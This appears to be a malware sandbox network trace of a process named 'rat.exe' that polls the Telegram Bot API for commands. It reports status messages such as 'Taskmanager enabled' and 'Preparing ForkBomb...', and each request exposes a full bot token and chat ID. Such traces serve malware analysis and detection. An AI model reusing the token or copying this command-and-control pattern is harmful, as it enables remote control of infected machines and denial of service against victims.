Date: Sun, 12 Jan 2025 11:20:10 GMT
Content-Type: application/json
Content-Length: 23
Connection: keep-alive
Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
Access-Control-Allow-Origin: *
Access-Control-Allow-Methods: GET, POST, OPTIONS
Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
GET

https://api.telegram.org/bot8014667160:AAFqSbz3GwG_v0L0NNlpN0dSG5-tCdm4TtY/getUpdates?offset=972506664

rat.exe

Remote address:

149.154.167.220:443

Request

GET /bot8014667160:AAFqSbz3GwG_v0L0NNlpN0dSG5-tCdm4TtY/getUpdates?offset=972506664 HTTP/1.1
Host: api.telegram.org

Response

HTTP/1.1 200 OK

Server: nginx/1.18.0
Date: Sun, 12 Jan 2025 11:20:11 GMT
Content-Type: application/json
Content-Length: 23
Connection: keep-alive
Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
Access-Control-Allow-Origin: *
Access-Control-Allow-Methods: GET, POST, OPTIONS
Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
GET

https://api.telegram.org/bot8014667160:AAFqSbz3GwG_v0L0NNlpN0dSG5-tCdm4TtY/getUpdates?offset=972506665

rat.exe

Remote address:

149.154.167.220:443

Request

GET /bot8014667160:AAFqSbz3GwG_v0L0NNlpN0dSG5-tCdm4TtY/getUpdates?offset=972506665 HTTP/1.1
Host: api.telegram.org

Response

HTTP/1.1 200 OK

Server: nginx/1.18.0
Date: Sun, 12 Jan 2025 11:20:12 GMT
Content-Type: application/json
Content-Length: 382
Connection: keep-alive
Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
Access-Control-Allow-Origin: *
Access-Control-Allow-Methods: GET, POST, OPTIONS
Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
GET

https://api.telegram.org/bot8014667160:AAFqSbz3GwG_v0L0NNlpN0dSG5-tCdm4TtY/sendMessage?chat_id=-4791200354&text=%E2%9C%85%20Taskmanager%20enabled

rat.exe

Remote address:

149.154.167.220:443

Request

GET /bot8014667160:AAFqSbz3GwG_v0L0NNlpN0dSG5-tCdm4TtY/sendMessage?chat_id=-4791200354&text=%E2%9C%85%20Taskmanager%20enabled HTTP/1.1
Host: api.telegram.org

Response

HTTP/1.1 200 OK

Server: nginx/1.18.0
Date: Sun, 12 Jan 2025 11:20:13 GMT
Content-Type: application/json
Content-Length: 275
Connection: keep-alive
Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
Access-Control-Allow-Origin: *
Access-Control-Allow-Methods: GET, POST, OPTIONS
Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
GET

https://api.telegram.org/bot8014667160:AAFqSbz3GwG_v0L0NNlpN0dSG5-tCdm4TtY/getUpdates?offset=972506648

rat.exe

Remote address:

149.154.167.220:443

Request

GET /bot8014667160:AAFqSbz3GwG_v0L0NNlpN0dSG5-tCdm4TtY/getUpdates?offset=972506648 HTTP/1.1
Host: api.telegram.org

Response

HTTP/1.1 200 OK

Server: nginx/1.18.0
Date: Sun, 12 Jan 2025 11:20:13 GMT
Content-Type: application/json
Content-Length: 23
Connection: keep-alive
Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
Access-Control-Allow-Origin: *
Access-Control-Allow-Methods: GET, POST, OPTIONS
Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
GET

https://api.telegram.org/bot8014667160:AAFqSbz3GwG_v0L0NNlpN0dSG5-tCdm4TtY/getUpdates?offset=972506649

rat.exe

Remote address:

149.154.167.220:443

Request

GET /bot8014667160:AAFqSbz3GwG_v0L0NNlpN0dSG5-tCdm4TtY/getUpdates?offset=972506649 HTTP/1.1
Host: api.telegram.org

Response

HTTP/1.1 200 OK

Server: nginx/1.18.0
Date: Sun, 12 Jan 2025 11:20:15 GMT
Content-Type: application/json
Content-Length: 23
Connection: keep-alive
Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
Access-Control-Allow-Origin: *
Access-Control-Allow-Methods: GET, POST, OPTIONS
Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
GET

https://api.telegram.org/bot8014667160:AAFqSbz3GwG_v0L0NNlpN0dSG5-tCdm4TtY/getUpdates?offset=972506650

rat.exe

Remote address:

149.154.167.220:443

Request

GET /bot8014667160:AAFqSbz3GwG_v0L0NNlpN0dSG5-tCdm4TtY/getUpdates?offset=972506650 HTTP/1.1
Host: api.telegram.org

Response

HTTP/1.1 200 OK

Server: nginx/1.18.0
Date: Sun, 12 Jan 2025 11:20:16 GMT
Content-Type: application/json
Content-Length: 23
Connection: keep-alive
Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
Access-Control-Allow-Origin: *
Access-Control-Allow-Methods: GET, POST, OPTIONS
Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
GET

https://api.telegram.org/bot8014667160:AAFqSbz3GwG_v0L0NNlpN0dSG5-tCdm4TtY/getUpdates?offset=972506651

rat.exe

Remote address:

149.154.167.220:443

Request

GET /bot8014667160:AAFqSbz3GwG_v0L0NNlpN0dSG5-tCdm4TtY/getUpdates?offset=972506651 HTTP/1.1
Host: api.telegram.org

Response

HTTP/1.1 200 OK

Server: nginx/1.18.0
Date: Sun, 12 Jan 2025 11:20:17 GMT
Content-Type: application/json
Content-Length: 23
Connection: keep-alive
Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
Access-Control-Allow-Origin: *
Access-Control-Allow-Methods: GET, POST, OPTIONS
Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
GET

https://api.telegram.org/bot8014667160:AAFqSbz3GwG_v0L0NNlpN0dSG5-tCdm4TtY/getUpdates?offset=972506652

rat.exe

Remote address:

149.154.167.220:443

Request

GET /bot8014667160:AAFqSbz3GwG_v0L0NNlpN0dSG5-tCdm4TtY/getUpdates?offset=972506652 HTTP/1.1
Host: api.telegram.org

Response

HTTP/1.1 200 OK

Server: nginx/1.18.0
Date: Sun, 12 Jan 2025 11:20:18 GMT
Content-Type: application/json
Content-Length: 23
Connection: keep-alive
Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
Access-Control-Allow-Origin: *
Access-Control-Allow-Methods: GET, POST, OPTIONS
Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
GET

https://api.telegram.org/bot8014667160:AAFqSbz3GwG_v0L0NNlpN0dSG5-tCdm4TtY/getUpdates?offset=972506653

rat.exe

Remote address:

149.154.167.220:443

Request

GET /bot8014667160:AAFqSbz3GwG_v0L0NNlpN0dSG5-tCdm4TtY/getUpdates?offset=972506653 HTTP/1.1
Host: api.telegram.org

Response

HTTP/1.1 200 OK

Server: nginx/1.18.0
Date: Sun, 12 Jan 2025 11:20:19 GMT
Content-Type: application/json
Content-Length: 23
Connection: keep-alive
Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
Access-Control-Allow-Origin: *
Access-Control-Allow-Methods: GET, POST, OPTIONS
Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
GET

https://api.telegram.org/bot8014667160:AAFqSbz3GwG_v0L0NNlpN0dSG5-tCdm4TtY/getUpdates?offset=972506654

rat.exe

Remote address:

149.154.167.220:443

Request

GET /bot8014667160:AAFqSbz3GwG_v0L0NNlpN0dSG5-tCdm4TtY/getUpdates?offset=972506654 HTTP/1.1
Host: api.telegram.org

Response

HTTP/1.1 200 OK

Server: nginx/1.18.0
Date: Sun, 12 Jan 2025 11:20:20 GMT
Content-Type: application/json
Content-Length: 23
Connection: keep-alive
Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
Access-Control-Allow-Origin: *
Access-Control-Allow-Methods: GET, POST, OPTIONS
Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
GET

https://api.telegram.org/bot8014667160:AAFqSbz3GwG_v0L0NNlpN0dSG5-tCdm4TtY/getUpdates?offset=972506655

rat.exe

Remote address:

149.154.167.220:443

Request

GET /bot8014667160:AAFqSbz3GwG_v0L0NNlpN0dSG5-tCdm4TtY/getUpdates?offset=972506655 HTTP/1.1
Host: api.telegram.org

Response

HTTP/1.1 200 OK

Server: nginx/1.18.0
Date: Sun, 12 Jan 2025 11:20:21 GMT
Content-Type: application/json
Content-Length: 23
Connection: keep-alive
Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
Access-Control-Allow-Origin: *
Access-Control-Allow-Methods: GET, POST, OPTIONS
Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
GET

https://api.telegram.org/bot8014667160:AAFqSbz3GwG_v0L0NNlpN0dSG5-tCdm4TtY/getUpdates?offset=972506656

rat.exe

Remote address:

149.154.167.220:443

Request

GET /bot8014667160:AAFqSbz3GwG_v0L0NNlpN0dSG5-tCdm4TtY/getUpdates?offset=972506656 HTTP/1.1
Host: api.telegram.org

Response

HTTP/1.1 200 OK

Server: nginx/1.18.0
Date: Sun, 12 Jan 2025 11:20:22 GMT
Content-Type: application/json
Content-Length: 23
Connection: keep-alive
Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
Access-Control-Allow-Origin: *
Access-Control-Allow-Methods: GET, POST, OPTIONS
Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
GET

https://api.telegram.org/bot8014667160:AAFqSbz3GwG_v0L0NNlpN0dSG5-tCdm4TtY/getUpdates?offset=972506657

rat.exe

Remote address:

149.154.167.220:443

Request

GET /bot8014667160:AAFqSbz3GwG_v0L0NNlpN0dSG5-tCdm4TtY/getUpdates?offset=972506657 HTTP/1.1
Host: api.telegram.org

Response

HTTP/1.1 200 OK

Server: nginx/1.18.0
Date: Sun, 12 Jan 2025 11:20:23 GMT
Content-Type: application/json
Content-Length: 23
Connection: keep-alive
Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
Access-Control-Allow-Origin: *
Access-Control-Allow-Methods: GET, POST, OPTIONS
Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
GET

https://api.telegram.org/bot8014667160:AAFqSbz3GwG_v0L0NNlpN0dSG5-tCdm4TtY/getUpdates?offset=972506658

rat.exe

Remote address:

149.154.167.220:443

Request

GET /bot8014667160:AAFqSbz3GwG_v0L0NNlpN0dSG5-tCdm4TtY/getUpdates?offset=972506658 HTTP/1.1
Host: api.telegram.org

Response

HTTP/1.1 200 OK

Server: nginx/1.18.0
Date: Sun, 12 Jan 2025 11:20:24 GMT
Content-Type: application/json
Content-Length: 23
Connection: keep-alive
Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
Access-Control-Allow-Origin: *
Access-Control-Allow-Methods: GET, POST, OPTIONS
Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
GET

https://api.telegram.org/bot8014667160:AAFqSbz3GwG_v0L0NNlpN0dSG5-tCdm4TtY/getUpdates?offset=972506659

rat.exe

Remote address:

149.154.167.220:443

Request

GET /bot8014667160:AAFqSbz3GwG_v0L0NNlpN0dSG5-tCdm4TtY/getUpdates?offset=972506659 HTTP/1.1
Host: api.telegram.org

Response

HTTP/1.1 200 OK

Server: nginx/1.18.0
Date: Sun, 12 Jan 2025 11:20:25 GMT
Content-Type: application/json
Content-Length: 23
Connection: keep-alive
Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
Access-Control-Allow-Origin: *
Access-Control-Allow-Methods: GET, POST, OPTIONS
Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
GET

https://api.telegram.org/bot8014667160:AAFqSbz3GwG_v0L0NNlpN0dSG5-tCdm4TtY/getUpdates?offset=972506660

rat.exe

Remote address:

149.154.167.220:443

Request

GET /bot8014667160:AAFqSbz3GwG_v0L0NNlpN0dSG5-tCdm4TtY/getUpdates?offset=972506660 HTTP/1.1
Host: api.telegram.org

Response

HTTP/1.1 200 OK

Server: nginx/1.18.0
Date: Sun, 12 Jan 2025 11:20:26 GMT
Content-Type: application/json
Content-Length: 23
Connection: keep-alive
Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
Access-Control-Allow-Origin: *
Access-Control-Allow-Methods: GET, POST, OPTIONS
Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
GET

https://api.telegram.org/bot8014667160:AAFqSbz3GwG_v0L0NNlpN0dSG5-tCdm4TtY/getUpdates?offset=972506661

rat.exe

Remote address:

149.154.167.220:443

Request

GET /bot8014667160:AAFqSbz3GwG_v0L0NNlpN0dSG5-tCdm4TtY/getUpdates?offset=972506661 HTTP/1.1
Host: api.telegram.org

Response

HTTP/1.1 200 OK

Server: nginx/1.18.0
Date: Sun, 12 Jan 2025 11:20:27 GMT
Content-Type: application/json
Content-Length: 23
Connection: keep-alive
Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
Access-Control-Allow-Origin: *
Access-Control-Allow-Methods: GET, POST, OPTIONS
Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
GET

https://api.telegram.org/bot8014667160:AAFqSbz3GwG_v0L0NNlpN0dSG5-tCdm4TtY/getUpdates?offset=972506662

rat.exe

Remote address:

149.154.167.220:443

Request

GET /bot8014667160:AAFqSbz3GwG_v0L0NNlpN0dSG5-tCdm4TtY/getUpdates?offset=972506662 HTTP/1.1
Host: api.telegram.org

Response

HTTP/1.1 200 OK

Server: nginx/1.18.0
Date: Sun, 12 Jan 2025 11:20:28 GMT
Content-Type: application/json
Content-Length: 23
Connection: keep-alive
Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
Access-Control-Allow-Origin: *
Access-Control-Allow-Methods: GET, POST, OPTIONS
Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
GET

https://api.telegram.org/bot8014667160:AAFqSbz3GwG_v0L0NNlpN0dSG5-tCdm4TtY/getUpdates?offset=972506663

rat.exe

Remote address:

149.154.167.220:443

Request

GET /bot8014667160:AAFqSbz3GwG_v0L0NNlpN0dSG5-tCdm4TtY/getUpdates?offset=972506663 HTTP/1.1
Host: api.telegram.org

Response

HTTP/1.1 200 OK

Server: nginx/1.18.0
Date: Sun, 12 Jan 2025 11:20:29 GMT
Content-Type: application/json
Content-Length: 23
Connection: keep-alive
Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
Access-Control-Allow-Origin: *
Access-Control-Allow-Methods: GET, POST, OPTIONS
Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
GET

https://api.telegram.org/bot8014667160:AAFqSbz3GwG_v0L0NNlpN0dSG5-tCdm4TtY/getUpdates?offset=972506664

rat.exe

Remote address:

149.154.167.220:443

Request

GET /bot8014667160:AAFqSbz3GwG_v0L0NNlpN0dSG5-tCdm4TtY/getUpdates?offset=972506664 HTTP/1.1
Host: api.telegram.org

Response

HTTP/1.1 200 OK

Server: nginx/1.18.0
Date: Sun, 12 Jan 2025 11:20:30 GMT
Content-Type: application/json
Content-Length: 23
Connection: keep-alive
Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
Access-Control-Allow-Origin: *
Access-Control-Allow-Methods: GET, POST, OPTIONS
Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
GET

https://api.telegram.org/bot8014667160:AAFqSbz3GwG_v0L0NNlpN0dSG5-tCdm4TtY/getUpdates?offset=972506665

rat.exe

Remote address:

149.154.167.220:443

Request

GET /bot8014667160:AAFqSbz3GwG_v0L0NNlpN0dSG5-tCdm4TtY/getUpdates?offset=972506665 HTTP/1.1
Host: api.telegram.org

Response

HTTP/1.1 200 OK

Server: nginx/1.18.0
Date: Sun, 12 Jan 2025 11:20:32 GMT
Content-Type: application/json
Content-Length: 23
Connection: keep-alive
Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
Access-Control-Allow-Origin: *
Access-Control-Allow-Methods: GET, POST, OPTIONS
Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
GET

https://api.telegram.org/bot8014667160:AAFqSbz3GwG_v0L0NNlpN0dSG5-tCdm4TtY/getUpdates?offset=972506666

rat.exe

Remote address:

149.154.167.220:443

Request

GET /bot8014667160:AAFqSbz3GwG_v0L0NNlpN0dSG5-tCdm4TtY/getUpdates?offset=972506666 HTTP/1.1
Host: api.telegram.org

Response

HTTP/1.1 200 OK

Server: nginx/1.18.0
Date: Sun, 12 Jan 2025 11:20:33 GMT
Content-Type: application/json
Content-Length: 23
Connection: keep-alive
Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
Access-Control-Allow-Origin: *
Access-Control-Allow-Methods: GET, POST, OPTIONS
Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
GET

https://api.telegram.org/bot8014667160:AAFqSbz3GwG_v0L0NNlpN0dSG5-tCdm4TtY/getUpdates?offset=972506667

rat.exe

Remote address:

149.154.167.220:443

Request

GET /bot8014667160:AAFqSbz3GwG_v0L0NNlpN0dSG5-tCdm4TtY/getUpdates?offset=972506667 HTTP/1.1
Host: api.telegram.org

Response

HTTP/1.1 200 OK

Server: nginx/1.18.0
Date: Sun, 12 Jan 2025 11:20:34 GMT
Content-Type: application/json
Content-Length: 23
Connection: keep-alive
Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
Access-Control-Allow-Origin: *
Access-Control-Allow-Methods: GET, POST, OPTIONS
Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
GET

https://api.telegram.org/bot8014667160:AAFqSbz3GwG_v0L0NNlpN0dSG5-tCdm4TtY/getUpdates?offset=972506668

rat.exe

Remote address:

149.154.167.220:443

Request

GET /bot8014667160:AAFqSbz3GwG_v0L0NNlpN0dSG5-tCdm4TtY/getUpdates?offset=972506668 HTTP/1.1
Host: api.telegram.org

Response

HTTP/1.1 200 OK

Server: nginx/1.18.0
Date: Sun, 12 Jan 2025 11:20:35 GMT
Content-Type: application/json
Content-Length: 23
Connection: keep-alive
Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
Access-Control-Allow-Origin: *
Access-Control-Allow-Methods: GET, POST, OPTIONS
Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
GET

https://api.telegram.org/bot8014667160:AAFqSbz3GwG_v0L0NNlpN0dSG5-tCdm4TtY/getUpdates?offset=972506669

rat.exe

Remote address:

149.154.167.220:443

Request

GET /bot8014667160:AAFqSbz3GwG_v0L0NNlpN0dSG5-tCdm4TtY/getUpdates?offset=972506669 HTTP/1.1
Host: api.telegram.org

Response

HTTP/1.1 200 OK

Server: nginx/1.18.0
Date: Sun, 12 Jan 2025 11:20:36 GMT
Content-Type: application/json
Content-Length: 23
Connection: keep-alive
Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
Access-Control-Allow-Origin: *
Access-Control-Allow-Methods: GET, POST, OPTIONS
Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
GET

https://api.telegram.org/bot8014667160:AAFqSbz3GwG_v0L0NNlpN0dSG5-tCdm4TtY/getUpdates?offset=972506670

rat.exe

Remote address:

149.154.167.220:443

Request

GET /bot8014667160:AAFqSbz3GwG_v0L0NNlpN0dSG5-tCdm4TtY/getUpdates?offset=972506670 HTTP/1.1
Host: api.telegram.org

Response

HTTP/1.1 200 OK

Server: nginx/1.18.0
Date: Sun, 12 Jan 2025 11:20:37 GMT
Content-Type: application/json
Content-Length: 372
Connection: keep-alive
Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
Access-Control-Allow-Origin: *
Access-Control-Allow-Methods: GET, POST, OPTIONS
Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
GET

https://api.telegram.org/bot8014667160:AAFqSbz3GwG_v0L0NNlpN0dSG5-tCdm4TtY/sendMessage?chat_id=-4791200354&text=%F0%9F%9A%A8%20Preparing%20ForkBomb...

rat.exe

Remote address:

149.154.167.220:443

Request

GET /bot8014667160:AAFqSbz3GwG_v0L0NNlpN0dSG5-tCdm4TtY/sendMessage?chat_id=-4791200354&text=%F0%9F%9A%A8%20Preparing%20ForkBomb... HTTP/1.1
Host: api.telegram.org

Response

HTTP/1.1 200 OK

Server: nginx/1.18.0
Date: Sun, 12 Jan 2025 11:20:37 GMT
Content-Type: application/json
Content-Length: 283
Connection: keep-alive
Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
Access-Control-Allow-Origin: *
Access-Control-Allow-Methods: GET, POST, OPTIONS
Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
GET

https://api.telegram.org/bot8014667160:AAFqSbz3GwG_v0L0NNlpN0dSG5-tCdm4TtY/getUpdates?offset=972506649

rat.exe

Remote address:

149.154.167.220:443

Request

GET /bot8014667160:AAFqSbz3GwG_v0L0NNlpN0dSG5-tCdm4TtY/getUpdates?offset=972506649 HTTP/1.1
Host: api.telegram.org

Response

HTTP/1.1 200 OK

Server: nginx/1.18.0
Date: Sun, 12 Jan 2025 11:20:38 GMT
Content-Type: application/json
Content-Length: 23
Connection: keep-alive
Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
Access-Control-Allow-Origin: *
Access-Control-Allow-Methods: GET, POST, OPTIONS
Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
GET

https://api.telegram.org/bot8014667160:AAFqSbz3GwG_v0L0NNlpN0dSG5-tCdm4TtY/getUpdates?offset=972506650

rat.exe

Remote address:

149.154.167.220:443

Request

GET /bot8014667160:AAFqSbz3GwG_v0L0NNlpN0dSG5-tCdm4TtY/getUpdates?offset=972506650 HTTP/1.1
Host: api.telegram.org

Response

HTTP/1.1 200 OK

Server: nginx/1.18.0
Date: Sun, 12 Jan 2025 11:20:39 GMT
Content-Type: application/json
Content-Length: 23
Connection: keep-alive
Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
Access-Control-Allow-Origin: *
Access-Control-Allow-Methods: GET, POST, OPTIONS
Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
GET

https://api.telegram.org/bot8014667160:AAFqSbz3GwG_v0L0NNlpN0dSG5-tCdm4TtY/getUpdates?offset=972506651

rat.exe

Remote address:

149.154.167.220:443

Request

GET /bot8014667160:AAFqSbz3GwG_v0L0NNlpN0dSG5-tCdm4TtY/getUpdates?offset=972506651 HTTP/1.1
Host: api.telegram.org

Response

HTTP/1.1 200 OK

Server: nginx/1.18.0
Date: Sun, 12 Jan 2025 11:20:40 GMT
Content-Type: application/json
Content-Length: 23
Connection: keep-alive
Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
Access-Control-Allow-Origin: *
Access-Control-Allow-Methods: GET, POST, OPTIONS
Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
GET

https://api.telegram.org/bot8014667160:AAFqSbz3GwG_v0L0NNlpN0dSG5-tCdm4TtY/getUpdates?offset=972506652

rat.exe

Remote address:

149.154.167.220:443

Request

GET /bot8014667160:AAFqSbz3GwG_v0L0NNlpN0dSG5-tCdm4TtY/getUpdates?offset=972506652 HTTP/1.1
Host: api.telegram.org

Response

HTTP/1.1 200 OK

Server: nginx/1.18.0
Date: Sun, 12 Jan 2025 11:20:41 GMT
Content-Type: application/json
Content-Length: 23
Connection: keep-alive
Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
Access-Control-Allow-Origin: *
Access-Control-Allow-Methods: GET, POST, OPTIONS
Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
GET

https://api.telegram.org/bot8014667160:AAFqSbz3GwG_v0L0NNlpN0dSG5-tCdm4TtY/getUpdates?offset=972506653

rat.exe

Remote address:

149.154.167.220:443

Request

GET /bot8014667160:AAFqSbz3GwG_v0L0NNlpN0dSG5-tCdm4TtY/getUpdates?offset=972506653 HTTP/1.1
Host: api.telegram.org

Response

HTTP/1.1 200 OK

Server: nginx/1.18.0
Date: Sun, 12 Jan 2025 11:20:42 GMT
Content-Type: application/json
Content-Length: 23
Connection: keep-alive
Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
Access-Control-Allow-Origin: *
Access-Control-Allow-Methods: GET, POST, OPTIONS
Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
GET

https://api.telegram.org/bot8014667160:AAFqSbz3GwG_v0L0NNlpN0dSG5-tCdm4TtY/getUpdates?offset=972506654

rat.exe

Remote address:

149.154.167.220:443

Request

GET /bot8014667160:AAFqSbz3GwG_v0L0NNlpN0dSG5-tCdm4TtY/getUpdates?offset=972506654 HTTP/1.1
Host: api.telegram.org

Response

HTTP/1.1 200 OK

Server: nginx/1.18.0
Date: Sun, 12 Jan 2025 11:20:43 GMT
Content-Type: application/json
Content-Length: 23
Connection: keep-alive
Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
Access-Control-Allow-Origin: *
Access-Control-Allow-Methods: GET, POST, OPTIONS
Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
GET

https://api.telegram.org/bot8014667160:AAFqSbz3GwG_v0L0NNlpN0dSG5-tCdm4TtY/getUpdates?offset=972506655

rat.exe

Remote address:

149.154.167.220:443

Request

GET /bot8014667160:AAFqSbz3GwG_v0L0NNlpN0dSG5-tCdm4TtY/getUpdates?offset=972506655 HTTP/1.1
Host: api.telegram.org

Response

HTTP/1.1 200 OK

Server: nginx/1.18.0
Date: Sun, 12 Jan 2025 11:20:44 GMT
Content-Type: application/json
Content-Length: 23
Connection: keep-alive
Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
Access-Control-Allow-Origin: *
Access-Control-Allow-Methods: GET, POST, OPTIONS
Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
GET

https://api.telegram.org/bot8014667160:AAFqSbz3GwG_v0L0NNlpN0dSG5-tCdm4TtY/getUpdates?offset=972506656

rat.exe

Remote address:

149.154.167.220:443

Request

GET /bot8014667160:AAFqSbz3GwG_v0L0NNlpN0dSG5-tCdm4TtY/getUpdates?offset=972506656 HTTP/1.1
Host: api.telegram.org

Response

HTTP/1.1 200 OK

Server: nginx/1.18.0
Date: Sun, 12 Jan 2025 11:20:45 GMT
Content-Type: application/json
Content-Length: 23
Connection: keep-alive
Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
Access-Control-Allow-Origin: *
Access-Control-Allow-Methods: GET, POST, OPTIONS
Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
GET

https://api.telegram.org/bot8014667160:AAFqSbz3GwG_v0L0NNlpN0dSG5-tCdm4TtY/getUpdates?offset=972506657

rat.exe

Remote address:

149.154.167.220:443

Request

GET /bot8014667160:AAFqSbz3GwG_v0L0NNlpN0dSG5-tCdm4TtY/getUpdates?offset=972506657 HTTP/1.1
Host: api.telegram.org

Response

HTTP/1.1 200 OK

Server: nginx/1.18.0
Date: Sun, 12 Jan 2025 11:20:46 GMT
Content-Type: application/json
Content-Length: 23
Connection: keep-alive
Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
Access-Control-Allow-Origin: *
Access-Control-Allow-Methods: GET, POST, OPTIONS
Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
GET

https://api.telegram.org/bot8014667160:AAFqSbz3GwG_v0L0NNlpN0dSG5-tCdm4TtY/getUpdates?offset=972506658

rat.exe

Remote address:

149.154.167.220:443

Request

GET /bot8014667160:AAFqSbz3GwG_v0L0NNlpN0dSG5-tCdm4TtY/getUpdates?offset=972506658 HTTP/1.1
Host: api.telegram.org

Response

HTTP/1.1 200 OK

Server: nginx/1.18.0
Date: Sun, 12 Jan 2025 11:20:48 GMT
Content-Type: application/json
Content-Length: 23
Connection: keep-alive
Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
Access-Control-Allow-Origin: *
Access-Control-Allow-Methods: GET, POST, OPTIONS
Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
GET

https://api.telegram.org/bot8014667160:AAFqSbz3GwG_v0L0NNlpN0dSG5-tCdm4TtY/getUpdates?offset=972506659

rat.exe

Remote address:

149.154.167.220:443

Request

GET /bot8014667160:AAFqSbz3GwG_v0L0NNlpN0dSG5-tCdm4TtY/getUpdates?offset=972506659 HTTP/1.1
Host: api.telegram.org

Response

HTTP/1.1 200 OK

Server: nginx/1.18.0
Date: Sun, 12 Jan 2025 11:20:49 GMT
Content-Type: application/json
Content-Length: 23
Connection: keep-alive
Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
Access-Control-Allow-Origin: *
Access-Control-Allow-Methods: GET, POST, OPTIONS
Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
GET

https://api.telegram.org/bot8014667160:AAFqSbz3GwG_v0L0NNlpN0dSG5-tCdm4TtY/getUpdates?offset=972506660

rat.exe

Remote address:

149.154.167.220:443

Request

GET /bot8014667160:AAFqSbz3GwG_v0L0NNlpN0dSG5-tCdm4TtY/getUpdates?offset=972506660 HTTP/1.1
Host: api.telegram.org

Response

HTTP/1.1 200 OK

Server: nginx/1.18.0
Date: Sun, 12 Jan 2025 11:20:50 GMT
Content-Type: application/json
Content-Length: 23
Connection: keep-alive
Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
Access-Control-Allow-Origin: *
Access-Control-Allow-Methods: GET, POST, OPTIONS
Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
GET

https://api.telegram.org/bot8014667160:AAFqSbz3GwG_v0L0NNlpN0dSG5-tCdm4TtY/getUpdates?offset=972506661

rat.exe

Remote address:

149.154.167.220:443

Request

GET /bot8014667160:AAFqSbz3GwG_v0L0NNlpN0dSG5-tCdm4TtY/getUpdates?offset=972506661 HTTP/1.1
Host: api.telegram.org

Response

HTTP/1.1 200 OK

Server: nginx/1.18.0
Date: Sun, 12 Jan 2025 11:20:51 GMT
Content-Type: application/json
Content-Length: 23
Connection: keep-alive
Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
Access-Control-Allow-Origin: *
Access-Control-Allow-Methods: GET, POST, OPTIONS
